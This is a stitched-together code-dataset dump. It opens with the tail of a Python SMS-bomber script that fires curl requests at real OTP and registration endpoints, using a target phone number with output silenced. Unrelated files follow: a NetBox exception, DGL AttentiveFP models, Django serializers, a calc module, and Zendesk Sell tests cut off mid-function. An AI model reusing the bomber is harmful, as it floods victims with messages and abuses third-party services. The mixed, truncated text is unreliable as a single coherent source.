G_ENABLED_IDPS=google; _ga=GA1.2.197673884.1605949721; _gid=GA1.2.2011551121.1605949721; _gcl_au=1.1.1284674085.1605949721; _gat=1; _fbp=fb.1.1605949725797.872815084; _fw_crm_v=96418cad-5ce4-4609-9b0d-fe1684f16041; cto_bundle=q-RBWF9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzelBlWklIZnMxVm1ycVBzVk5jMzYwUkRBdVg4ek80SUQxeU9aZ0dseG5vQWwybXVWcWo5YyUyQnFvdmJjb1FWVzAzRTdWc0tiYWFVcVpMbGhrZjQ1YWdFZyUyRk0lMkJ5b05Oa01NWjc5eTN1dlNVejYxbkNOZnE2dHolMkZsdkduUkE4Wmd5dldNNzRUN3JoeExtJTJCYiUyQnM5b21heUlTayUzRA' -H 'TE: Trailers' --data-raw 'phone='''+target+'''' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.rentomojo.com/api/RMUsers/isNumberRegistered' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.rentomojo.com/mumbai' -H 'Content-Type: application/json;charset=utf-8' -H 'withCredentials: true' -H 'rm-client-name: client-web' -H 'rm-client-version: 13' -H 'sessionId: session-1605949938685-m3gdsh' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=dc4d85924d916df7e7a1b0a144b53e7ca1605949883; _vwo_uuid_v2=D6637B29EA9F6B29E349BE7B36096648B|a6e3521c930dd63de2922bba16e60703; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; _fbp=fb.1.1605949941784.2068999659; RT="sl=1&ss=1605949935544&tt=6520&obo=0&bcn=%2F%2F684fc53d.akstat.io%2F&sh=1605949942097%3D1%3A0%3A6520&dm=rentomojo.com&si=b0f64679-2212-4b3a-849d-fa2bdf60c9bf&ld=1605949942098&nu=https%3A%2F%2Fwww.rentomojo.com%2Fmumbai&cl=1605949947187"; _omappvp=EALX5XEd4a4qcO6gOTPpfl4VAbxfohcMBKZSynGfkno8kj7RX8j7LBBDlRGaMghvw8oDawMVPVNWmwBfIi50PJd4omnXGgfR; _omappvs=1605949942522; ajs_anonymous_id=%22c41f25db-40aa-4822-ace8-c8ebcc86ca78%22; _ga=GA1.2.1866039672.1605949944; _gid=GA1.2.1973545038.1605949944; mp_7dc5e475653b5ae6dfca58e1402254b7_mixpanel=%7B%22distinct_id%22%3A%20%22175ea1370f69-025b917de2c71-31634645-e0716-175ea1370f887%22%2C%22%24device_id%22%3A%20%22175ea1370f69-025b917de2c71-31634645-e0716-175ea1370f887%22%2C%22%24search_engine%22%3A%20%22google%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.google.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.google.com%22%7D; _uetsid=abcfa2302bd911eb88efb1f42010fd8e; _uetvid=abd091102bd911eb98ffc7a73299af54; SETUP_TIME=1605949947483; USER_DATA=%7B%22attributes%22%3A%5B%5D%2C%22subscribedToOldSdk%22%3Afalse%2C%22deviceUuid%22%3A%220b6072b7-159a-4a07-8bbf-65ba53500e35%22%2C%22deviceAdded%22%3Afalse%7D; moe_uuid=0b6072b7-159a-4a07-8bbf-65ba53500e35; _gat=1; 
cto_bundle=vlqVZl9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzek8yWkpaeDRNbyUyRkpKcFNZMkxGdzlCUVY1REh1SWdXSVVPeFgwVlRkWExFWUxjNVVzV1QzdVdoVWdKJTJGZ3QwWDNPSGMzRnNpckpvNHNtSEVLd0NHbm5ad0Rpa3laTjRpRHZ2TWtiZzFxU3FMbmtjUlc4ZVRMJTJCUUVYUSUyRjhnTEo5cVQ5UG1kS1hnYlVUQXNkdHZFWVpTcUs5VDJyVU5XeWVvVTFxSVR2WEY0aEpu' -H 'TE: Trailers' --data-raw '{"mobileNumber":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://orders.crisfood.com/api/api/user/otp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://orders.crisfood.com/register?redirect_to=' -H 'Content-Type: application/json;charset=utf-8' -H 'Connection: keep-alive' --data-raw '{"phone":"+91'''+target+'''"}' > /dev/null 2>&1
''')
if choose == 2:
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.yellow + "See you later")
exit()
else:
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Invalid Option")
except KeyboardInterrupt:
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "STOPPING BOMBER!")
exit()
| 348.224138 | 4,834 | 0.779819 | 9,475 | 80,788 | 6.54248 | 0.265646 | 0.011179 | 0.006824 | 0.012615 | 0.320116 | 0.283659 | 0.252266 | 0.22936 | 0.216099 | 0.190337 | 0 | 0.201955 | 0.074504 | 80,788 | 231 | 4,835 | 349.731602 | 0.626944 | 0 | 0 | 0.520737 | 0 | 0.281106 | 0.93088 | 0.591407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.018433 | 0.009217 | 0 | 0.059908 | 0.133641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f014d8a14d6e1c5eeb7e6fd6f039f45b924fd1b5 | 139 | py | Python | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 1 | 2020-07-16T17:50:31.000Z | 2020-07-16T17:50:31.000Z | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 9 | 2019-01-20T08:35:13.000Z | 2022-03-12T00:50:13.000Z | netbox/secrets/exceptions.py | 0xAalaoui/netbox | 07364abf9e9ff193bad49b790e657382cf186f0c | [
"Apache-2.0"
] | 1 | 2021-04-09T06:08:21.000Z | 2021-04-09T06:08:21.000Z | from __future__ import unicode_literals
class InvalidKey(Exception):
    """
    Raised when a provided key is invalid.
    """
    pass
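A brief usage sketch showing how a caller might raise and handle `InvalidKey`. The class is repeated so the snippet runs standalone; `check_key` and `is_valid` are hypothetical helpers for illustration only — NetBox's actual key checks live elsewhere in the secrets app.

```python
class InvalidKey(Exception):
    """
    Raised when a provided key is invalid.
    """
    pass


# Hypothetical validator for illustration only.
def check_key(key: str) -> None:
    if len(key) < 8:
        raise InvalidKey("Key must be at least 8 characters long.")


def is_valid(key: str) -> bool:
    try:
        check_key(key)
    except InvalidKey:
        return False
    return True
```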
# examples/property_prediction/MTL/model/attentivefp.py (dgl-lifesci, Apache-2.0)
import torch.nn as nn
from dgllife.model import AttentiveFPGNN, AttentiveFPReadout
from .regressor import BaseGNNRegressor, BaseGNNRegressorBypass
class AttentiveFPRegressor(BaseGNNRegressor):
"""AttentiveFP-based model for multitask molecular property prediction.
We assume all tasks are regression problems.
Parameters
----------
in_node_feats : int
Number of input node features
in_edge_feats : int
Number of input edge features
gnn_out_feats : int
The GNN output size
num_layers : int
Number of GNN layers
num_timesteps : int
Number of timesteps for updating molecular representations with GRU during readout
n_tasks : int
Number of prediction tasks
regressor_hidden_feats : int
Hidden size in MLP regressor
dropout : float
The probability for dropout. Default to 0, i.e. no dropout is performed.
"""
def __init__(self, in_node_feats, in_edge_feats, gnn_out_feats, num_layers, num_timesteps,
n_tasks, regressor_hidden_feats=128, dropout=0.):
super(AttentiveFPRegressor, self).__init__(readout_feats=gnn_out_feats,
n_tasks=n_tasks,
regressor_hidden_feats=regressor_hidden_feats,
dropout=dropout)
self.gnn = AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout)
self.readout = AttentiveFPReadout(gnn_out_feats, num_timesteps, dropout)
class AttentiveFPRegressorBypass(BaseGNNRegressorBypass):
"""AttentiveFP-based model for bypass multitask molecular property prediction.
We assume all tasks are regression problems.
Parameters
----------
in_node_feats : int
Number of input node features
in_edge_feats : int
Number of input edge features
gnn_out_feats : int
The GNN output size
num_layers : int
Number of GNN layers
num_timesteps : int
Number of timesteps for updating molecular representations with GRU during readout
n_tasks : int
Number of prediction tasks
regressor_hidden_feats : int
Hidden size in MLP regressor
dropout : float
The probability for dropout. Default to 0, i.e. no dropout is performed.
"""
def __init__(self, in_node_feats, in_edge_feats, gnn_out_feats, num_layers, num_timesteps,
n_tasks, regressor_hidden_feats=128, dropout=0.):
super(AttentiveFPRegressorBypass, self).__init__(
readout_feats= 2 * gnn_out_feats, n_tasks=n_tasks,
regressor_hidden_feats=regressor_hidden_feats,
dropout=dropout)
self.shared_gnn = AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout)
for _ in range(n_tasks):
self.task_gnns.append(AttentiveFPGNN(in_node_feats, in_edge_feats, num_layers,
gnn_out_feats, dropout))
self.readouts.append(AttentiveFPReadout(2 * gnn_out_feats, num_timesteps, dropout))
# authors/apps/articles/serializers.py (ah-backend-odin, BSD-3-Clause)
from rest_framework import serializers
from ..authentication.models import User
from .models import (Article,
ArticleLikes,
Thread,
Comment,
FavoriteArticle,
Rating,
LikeComment,
BookmarkingArticles,)
from rest_framework.validators import UniqueTogetherValidator
from ..authentication.serializers import UserSerializer
from taggit_serializer.serializers import (TagListSerializerField,
TaggitSerializer)
class CreateArticleAPIViewSerializer(TaggitSerializer, serializers.ModelSerializer):
tagList = TagListSerializerField()
author = serializers.SerializerMethodField()
def get_author(self, obj):
user = {
"username": obj.author.username,
"email": obj.author.email
}
return user
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList', 'slug', 'published', 'image', 'likescount', 'dislikescount', 'read_time', 'average_rating']
def validate_title(self, value):
if len(value) > 50:
raise serializers.ValidationError(
'The title should not be more than 50 characters'
)
return value
def validate_description(self, value):
if len(value) > 200:
raise serializers.ValidationError(
'The article should not be more than 200 characters'
)
return value
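Stripped of DRF, the two length rules above reduce to a single check. This framework-free sketch is illustration only, with `ValueError` standing in for `serializers.ValidationError`:

```python
# Plain-Python restatement of the length rules; ValueError stands in
# for serializers.ValidationError (illustration only, not DRF code).
def validate_length(value: str, limit: int, message: str) -> str:
    if len(value) > limit:
        raise ValueError(message)
    return value


def validate_title(value: str) -> str:
    return validate_length(value, 50, "The title should not be more than 50 characters")


def validate_description(value: str) -> str:
    return validate_length(value, 200, "The article should not be more than 200 characters")
```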
class ArticleDetailSerializer(serializers.ModelSerializer):
tagList = TagListSerializerField()
author = serializers.SerializerMethodField()
def get_author(self, obj):
user = {
"username": obj.author.username,
"email": obj.author.email
}
return user
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList',
'slug', 'published', 'image', 'likescount', 'dislikescount', 'read_time', 'comments', 'average_rating']
class UpdateArticleAPIVIEWSerializer(serializers.ModelSerializer):
class Meta:
model = Article
fields = ['title', 'description', 'body', 'author',
'created_at', 'updated_at', 'tagList', 'slug', 'published', 'image', 'read_time', 'average_rating']
def validate_title(self, value):
if len(value) > 50:
raise serializers.ValidationError(
'The title should not be more than 50 characters'
)
return value
def validate_description(self, value):
if len(value) > 200:
raise serializers.ValidationError(
'The article should not be more than 200 characters'
)
return value
def update_article(self, validated_data, article_instance):
article_instance.title = validated_data.get('title')
article_instance.body = validated_data.get('body')
article_instance.description = validated_data.get('description')
article_instance.image = validated_data.get('image')
article_instance.tagList = validated_data.get('tagList')
article_instance.save()
return article_instance
class LikeArticleAPIViewSerializer(serializers.ModelSerializer):
action_performed = "created"
class Meta:
model = ArticleLikes
fields = ['author', 'article', 'article_like']
def create(self, validated_data):
try: # pragma: no cover
self.instance = ArticleLikes.objects.filter(author=validated_data["author"].id)[
0:1].get()
except ArticleLikes.DoesNotExist: # pragma: no cover
return ArticleLikes.objects.create(**validated_data)
self.perform_update(validated_data)
return self.instance
def perform_update(self, validated_data):
if self.instance.article_like == validated_data["article_like"]:
self.instance.delete()
self.action_performed = "deleted"
else:
self.instance.article_like = validated_data["article_like"]
self.instance.save()
self.action_performed = "updated"
class FavoriteArticlesSerializer(serializers.ModelSerializer):
class Meta:
model = FavoriteArticle
fields = ('article', 'favorite_status', 'author',
'favorited_at', 'last_updated_at')
class CreateCommentAPIViewSerializer(serializers.ModelSerializer):
author = UserSerializer(read_only=True)
class Meta:
model = Comment
fields = ('id', 'body', 'article',
'createdAt', 'updatedAt', 'author', )
read_only_fields = ('article', )
def validate(self, data):
comment = data.get('body', None)
if len(comment) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment,
}
def create(self, validated_data):
author = self.context["author"]
article = self.context["article"]
body = validated_data.get('body')
# return Comment.objects.create(body=body, article=article)
return Comment.objects.create(body=body, author=author, article=article)
class CreateThreadAPIViewSerializer(serializers.ModelSerializer):
class Meta:
model = Thread
fields = ('id', 'body', 'author', 'comment', 'createdAt', 'updatedAt')
read_only_fields = ('author', 'comment', )
def validate(self, data):
comment_thread = data.get('body', None)
if len(comment_thread) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment_thread,
}
def create(self, validated_data):
author = self.context["author"]
comment = self.context["comment"]
body = validated_data.get('body')
return Thread.objects.create(body=body, author=author, comment=comment)
class RatingsSerializer(serializers.ModelSerializer):
class Meta:
model = Rating
fields = ['id', 'article', 'article_rate', 'author']
validators = [UniqueTogetherValidator(
queryset=Rating.objects.all(),
fields=('article', 'author',),
message=("You cannot rate this article more than once")
)]
class CreateCommentAPIViewSerializer(serializers.ModelSerializer):
author = UserSerializer(read_only=True)
class Meta:
model = Comment
fields = ('id', 'body', 'article', 'createdAt', 'updatedAt',
'author', 'commentlikescount', 'commentdislikescount')
read_only_fields = ('article', )
def validate(self, data):
comment = data.get('body', None)
if len(comment) < 2:
raise serializers.ValidationError(
"Comment should have atlest 2 characters"
)
else:
return {
'body': comment,
}
def create(self, validated_data):
author = self.context["author"]
article = self.context["article"]
body = validated_data.get('body')
return Comment.objects.create(body=body, author=author, article=article)
class CommentLikeSerializer(serializers.ModelSerializer):
class Meta:
model = LikeComment
fields = ['author', 'comment', 'like_status']
def create(self, validated_data):
try:
self.instance = LikeComment.objects.filter(author=validated_data["author"],
comment=validated_data["comment"])[0:1].get()
except LikeComment.DoesNotExist:
return LikeComment.objects.create(**validated_data)
self.perform_update(validated_data)
return self.instance
def perform_update(self, validated_data):
if self.instance.like_status == validated_data["like_status"]:
self.instance.delete()
else:
self.instance.like_status = validated_data["like_status"]
self.instance.save()
class BookmarkSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source="user.username")
article_id = serializers.ReadOnlyField(source="article_id.title")
class Meta:
model = BookmarkingArticles
fields = ['user', 'article_id', 'bookmarked_at']
# app/app/calc.py (recipe-app-api, MIT)
def add(x: int, y: int) -> int:
"""Add 2 numbers"""
return x + y
def subtract(x: int, y: int) -> int:
return x - y
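Because the two helpers are pure functions, their behavior is easy to check directly (they are repeated here so the snippet runs on its own):

```python
def add(x: int, y: int) -> int:
    """Add 2 numbers"""
    return x + y


def subtract(x: int, y: int) -> int:
    """Subtract y from x"""
    return x - y


total = add(2, 3)             # 5
difference = subtract(10, 4)  # 6
```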
# tests/app/clients/test_zendesk_sell.py (cds-snc/notification-api, MIT)
import json
from typing import Any, Dict, Optional, Union
import pytest
import requests_mock
from flask import Flask
from pytest_mock import MockFixture
from app.clients.zendesk_sell import ZenDeskSell
from app.models import Service
from app.user.contact_request import ContactRequest
def test_create_lead(notify_api: Flask):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"organization_name": "",
"email": "test@email.com",
"description": "Program: \n: ",
"tags": ["", "en"],
"status": "New",
"source_id": 2085874,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {
"Product": ["Notify"],
"Intended recipients": "No value",
},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/leads/upsert?email=test@email.com",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=201,
)
with notify_api.app_context():
response = ZenDeskSell().upsert_lead(ContactRequest(email_address="test@email.com", name="Test User"))
assert response == 201
def test_create_lead_missing_name(notify_api: Flask):
# Name field is a requirement for the zendesk sell API interface
with notify_api.app_context():
with pytest.raises(AssertionError):
ZenDeskSell().upsert_lead(ContactRequest(email_address="test@email.com"))
def generate_contact_url(existing_contact_id: Optional[str], service: Service) -> str:
if existing_contact_id:
return f"https://zendesksell-test.com/v2/contacts/{existing_contact_id}"
else:
return f"https://zendesksell-test.com/v2/contacts/upsert?" f"custom_fields[notify_user_id]={str(service.users[0].id)}"
def contact_http_method(existing_contact_id: Optional[str]):
return "PUT" if existing_contact_id else "POST"
@pytest.mark.parametrize(
"existing_contact_id,created_at,updated_at,expected_created",
[
(None, "2021-03-24T14:49:38Z", "2021-03-24T14:49:38Z", True),
(None, "2021-03-24T14:49:38Z", "2021-04-24T14:49:38Z", False),
("1", "2021-03-24T14:49:38Z", "2021-04-24T14:49:38Z", False),
],
)
def test_create_or_upsert_contact(
existing_contact_id: Optional[str],
created_at: str,
updated_at: str,
expected_created: bool,
notify_api: Flask,
sample_service: Service,
):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"email": "notify@digital.cabinet-office.gov.uk",
"mobile": "+16502532222",
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_user_id": str(sample_service.users[0].id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_contact_id = existing_contact_id or "123456789"
resp_data = {
"data": {
"id": expected_contact_id,
"created_at": created_at,
"updated_at": updated_at,
}
}
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
with notify_api.app_context():
contact_id, is_created = ZenDeskSell().upsert_contact(sample_service.users[0], existing_contact_id)
assert expected_contact_id == contact_id
assert is_created == expected_created
@pytest.mark.parametrize(
"existing_contact_id,expected_resp_data",
[
(None, {"blank": "blank"}),
(
None,
{
"data": {
"created_at": "2021-02-24T14:49:38Z",
"updated_at": "2021-03-24T14:49:38Z",
}
},
),
(None, {"data": {"id": "123456789", "created_at": "2021-02-24T14:49:38Z"}}),
(None, {"data": {"id": "123456789", "updated_at": "2021-02-24T14:49:38Z"}}),
(1, {"blank": "blank"}),
(
1,
{
"data": {
"created_at": "2021-02-24T14:49:38Z",
"updated_at": "2021-03-24T14:49:38Z",
}
},
),
(1, {"data": {"id": "123456789", "created_at": "2021-02-24T14:49:38Z"}}),
(1, {"data": {"id": "123456789", "updated_at": "2021-02-24T14:49:38Z"}}),
],
)
def test_create_contact_invalid_response(
notify_api: Flask,
sample_service: Service,
existing_contact_id: Optional[str],
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
def match_json(request):
expected = {
"data": {
"last_name": "User",
"first_name": "Test",
"email": "notify@digital.cabinet-office.gov.uk",
"mobile": "+16502532222",
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_user_id": str(sample_service.users[0].id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(expected_resp_data),
)
with notify_api.app_context():
contact_id, _ = ZenDeskSell().upsert_contact(sample_service.users[0], existing_contact_id)
assert not contact_id
def test_convert_lead_to_contact(notify_api: Flask, sample_service: Service):
lead_id = "123456789"
def match_json(request):
expected = {
"data": {
"lead_id": lead_id,
"owner_id": ZenDeskSell.OWNER_ID,
"create_deal": False,
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_contact_id = "1234567890"
rmock.request(
"GET",
url=f"https://zendesksell-test.com/v2/leads?email={sample_service.users[0].email_address}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"items": [{"data": {"id": lead_id}}]}),
)
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/lead_conversions",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps({"data": {"individual_id": expected_contact_id}}),
)
with notify_api.app_context():
contact_id = ZenDeskSell().convert_lead_to_contact(sample_service.users[0])
assert contact_id == expected_contact_id
def test_convert_lead_to_contact_search_fails(notify_api: Flask, sample_service: Service, mocker: MockFixture):
with notify_api.app_context():
search_lead_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_lead_id", return_value=None)
contact_id = ZenDeskSell().convert_lead_to_contact(sample_service.users[0])
search_lead_id_mock.assert_called_once_with(sample_service.users[0])
assert not contact_id
def test_delete_contact(notify_api: Flask):
def match_header(request):
return request.headers.get("Authorization") == "Bearer zendesksell-api-key"
with requests_mock.mock() as rmock:
contact_id = "123456789"
rmock.request(
"DELETE",
url=f"https://zendesksell-test.com/v2/contacts/{contact_id}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_header,
status_code=200,
)
with notify_api.app_context():
# as long as it doesn't throw we are OK as this is a best effort method
ZenDeskSell().delete_contact(contact_id)
def test_create_deal(notify_api: Flask, sample_service: Service):
def match_json(request):
expected = {
"data": {
"contact_id": "123456789",
"name": "Sample service",
"stage_id": 123456789,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_service_id": str(sample_service.id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
contact_id = "123456789"
expected_deal_id = "987654321"
resp_data = {"data": {"id": expected_deal_id, "contact_id": contact_id}}
rmock.request(
"POST",
url=f"https://zendesksell-test.com/v2/deals/upsert?" f"custom_fields[notify_service_id]={str(sample_service.id)}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
with notify_api.app_context():
deal_id = ZenDeskSell().upsert_deal(contact_id, sample_service, 123456789)
assert expected_deal_id == deal_id
@pytest.mark.parametrize(
"expected_resp_data",
[
{"blank": "blank"},
{"data": {"blank": "blank"}},
],
)
def test_create_deal_invalid_response(
notify_api: Flask,
sample_service: Service,
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
def match_json(request):
expected = {
"data": {
"contact_id": "123456789",
"name": "Sample service",
"stage_id": 123456789,
"owner_id": ZenDeskSell.OWNER_ID,
"custom_fields": {"notify_service_id": str(sample_service.id)},
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
contact_id = "123456789"
rmock.request(
"POST",
url=f"https://zendesksell-test.com/v2/deals/upsert?" f"custom_fields[notify_service_id]={str(sample_service.id)}",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(expected_resp_data),
)
with notify_api.app_context():
deal_id = ZenDeskSell().upsert_deal(contact_id, sample_service, 123456789)
assert not deal_id
def test_create_note(notify_api: Flask):
resource_id = "1"
def match_json(request):
expected = {
"data": {
"resource_type": "deal",
"resource_id": resource_id,
"content": "\n".join(
[
"Live Notes",
"service_name just requested to go live.",
"",
"- Department/org: department_org_name",
"- Intended recipients: intended_recipients",
"- Purpose: main_use_case",
"- Notification types: notification_types",
"- Expected monthly volume: expected_volume",
"---",
"service_url",
]
),
}
}
json_matches = request.json() == expected
basic_auth_header = request.headers.get("Authorization") == "Bearer zendesksell-api-key"
return json_matches and basic_auth_header
with requests_mock.mock() as rmock:
expected_note_id = "1"
resp_data = {"data": {"id": expected_note_id}}
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/notes",
headers={"Accept": "application/json", "Content-Type": "application/json"},
additional_matcher=match_json,
status_code=200,
text=json.dumps(resp_data),
)
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
with notify_api.app_context():
note_id = ZenDeskSell().create_note(ZenDeskSell.NoteResourceType.DEAL, resource_id, ContactRequest(**data))
assert expected_note_id == note_id
@pytest.mark.parametrize(
"expected_resp_data",
[
{"blank": "blank"},
{"data": {"blank": "blank"}},
],
)
def test_create_note_invalid_response(
notify_api: Flask,
sample_service: Service,
expected_resp_data: Dict[str, Dict[str, Union[int, str]]],
):
with requests_mock.mock() as rmock:
rmock.request(
"POST",
url="https://zendesksell-test.com/v2/notes",
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps(expected_resp_data),
)
data: Dict[str, Any] = {
"email_address": "test@email.com",
"service_name": "service_name",
"department_org_name": "department_org_name",
"intended_recipients": "intended_recipients",
"main_use_case": "main_use_case",
"notification_types": "notification_types",
"expected_volume": "expected_volume",
"service_url": "service_url",
"support_type": "go_live_request",
}
with notify_api.app_context():
note_id = ZenDeskSell().create_note(ZenDeskSell.NoteResourceType.DEAL, "1", ContactRequest(**data))
assert not note_id
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "1"), (True, None)])
def test_create_service_or_go_live_contact_fail(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(None, False))
convert_lead_to_contact_mock = mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
convert_lead_to_contact_mock.assert_called_once_with(sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "2"), (True, None)])
def test_create_service_or_go_live_deal_fail(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
with requests_mock.mock() as rmock:
contact_id = existing_contact_id or "1"
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"data": {"id": contact_id, "created_at": "1", "updated_at": "1"}}),
)
mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=None)
mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
contact_delete_mock = mocker.patch("app.user.rest.ZenDeskSell.delete_contact")
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
contact_delete_mock.assert_called_once_with(contact_id)
@pytest.mark.parametrize("is_go_live,existing_contact_id", [(False, None), (False, "1"), (True, None)])
def test_create_service_or_go_live_deal_fail_contact_exists(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
is_go_live: bool,
existing_contact_id: Optional[str],
):
with requests_mock.mock() as rmock:
contact_id = existing_contact_id or "1"
rmock.request(
contact_http_method(existing_contact_id),
url=generate_contact_url(existing_contact_id, sample_service),
headers={"Accept": "application/json", "Content-Type": "application/json"},
status_code=200,
text=json.dumps({"data": {"id": contact_id, "created_at": "1", "updated_at": "2"}}),
)
mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=None)
mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
contact_delete_mock = mocker.patch("app.user.rest.ZenDeskSell.delete_contact")
with notify_api.app_context():
if is_go_live:
assert not ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])
else:
assert not ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
contact_delete_mock.assert_not_called()
@pytest.mark.parametrize("existing_contact_id", [None, "2"])
def test_send_create_service(
notify_api: Flask,
sample_service: Service,
mocker: MockFixture,
existing_contact_id: Optional[str],
):
contact_id = existing_contact_id or "1"
upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(contact_id, True))
convert_lead_to_contact_mock = mocker.patch(
"app.user.rest.ZenDeskSell.convert_lead_to_contact",
return_value=existing_contact_id,
)
upsert_deal_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=1)
with notify_api.app_context():
